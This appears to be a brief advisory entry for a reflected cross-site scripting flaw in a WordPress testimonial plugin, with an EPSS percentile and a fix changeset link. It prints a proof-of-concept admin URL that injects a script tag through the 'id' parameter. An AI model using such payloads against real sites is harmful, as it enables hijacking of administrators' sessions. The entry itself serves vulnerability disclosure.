EPSS
Percentile
30.0%
The plugin does not sanitise and escape the id parameter before outputting it back in an attribute, leading to a Reflected cross-Site Scripting
https://example.com/wp-admin/admin.php?page=apct_testimonial_edit&id=1"><script>alert(/XSS/)</script>
plugins.trac.wordpress.org/changeset/2664185